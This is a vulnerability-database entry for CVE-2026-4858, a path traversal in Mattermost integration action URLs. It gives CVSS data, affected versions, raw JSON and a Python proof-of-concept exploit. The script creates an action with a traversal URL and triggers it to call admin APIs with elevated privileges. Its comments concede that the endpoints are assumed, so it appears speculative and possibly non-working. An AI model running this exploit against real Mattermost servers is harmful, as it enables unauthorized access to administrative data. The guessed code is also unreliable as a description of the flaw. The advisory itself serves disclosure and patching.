Security Vulnerability Report
CVE-2026-4858 CVSS 8.0 HIGH

Published: 2026-05-21 09:16:30
Last Modified: 2026-05-21 19:43:31

Description

Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check the integration URL for path traversal, which allows a malicious authenticated user to call an arbitrary API with the system admin Mattermost auth token via path traversal in the integration action URL. Mattermost Advisory ID: MMSA-2026-00640

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
Note: the score above is the record's Secondary CVSS v3.1 entry. The record's Primary entry (see the raw JSON below) rates the issue 9.9 CRITICAL with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, i.e. low attack complexity and no user interaction.
Weakness: CWE-22 (Path Traversal)

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.11.0 <= version < 10.11.15) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.4.0 <= version < 11.4.5) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.5.0 <= version < 11.5.4) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:11.6.0:*:*:*:*:*:*:* - VULNERABLE

Affected version ranges as stated in the advisory:
Mattermost 11.6.x <= 11.6.0
Mattermost 11.5.x <= 11.5.3
Mattermost 11.4.x <= 11.4.4
Mattermost 10.11.x <= 10.11.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-4858: Mattermost Path Traversal in Integration URL
import requests
import sys


def exploit(target, user_token):
    """
    Exploit the path traversal vulnerability in Mattermost integration URL.
    This allows calling arbitrary APIs with system admin privileges.
    """
    headers = {
        "Authorization": f"Bearer {user_token}",
        "Content-Type": "application/json"
    }
    # Step 1: Create a malicious integration/action with path traversal
    # Note: The actual endpoint depends on Mattermost API version
    create_action_url = f"{target}/api/v4/actions"
    # Payload using path traversal to access admin API (e.g., getting all users)
    # The server resolves this relative to an internal base, escaping the sandbox
    malicious_url = "api/v4/../../../../api/v4/users"
    payload = {
        "name": "ExploitAction",
        "integration": {"url": malicious_url}
    }
    try:
        print(f"[*] Creating malicious integration at {target}...")
        # In a real scenario, this creates the action that triggers the vulnerable code path
        r = requests.post(create_action_url, json=payload, headers=headers)
        if r.status_code == 201:
            action_id = r.json().get('id')
            print(f"[+] Action created with ID: {action_id}")
            # Step 2: Trigger the action to execute the path traversal
            trigger_url = f"{target}/api/v4/actions/{action_id}/trigger"
            print("[*] Triggering action to exploit path traversal...")
            # The response should contain data from the arbitrary API call
            trigger_r = requests.post(trigger_url, headers=headers)
            if trigger_r.status_code == 200:
                print("[+] Exploit successful! Arbitrary API data retrieved:")
                print(trigger_r.text)
            else:
                print(f"[-] Trigger failed. Status: {trigger_r.status_code}")
        else:
            print(f"[-] Failed to create action. Status: {r.status_code}")
            print(r.text)
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <user_token>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])
```

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-4858", "sourceIdentifier": "[email protected]", "published": "2026-05-21T09:16:30.143", "lastModified": "2026-05-21T19:43:31.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check integration URL for path traversal which allows an malicious authenticated user to call an arbitrary API via system admin Mattermost auth token using via path traversal in integration action URL.. Mattermost Advisory ID: MMSA-2026-00640"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.15", "matchCriteriaId": "6696A83A-CD06-45BD-A4C1-16A09C4CA15B"}, {"vulnerable": true, 
"criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.5", "matchCriteriaId": "AB489375-1F54-4A24-AE2C-37D92B27FF4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.5.0", "versionEndExcluding": "11.5.4", "matchCriteriaId": "617D4791-A087-42E8-BF73-B39B30CB29C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "6287452E-C8F4-4266-BBF9-0F839115215A"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```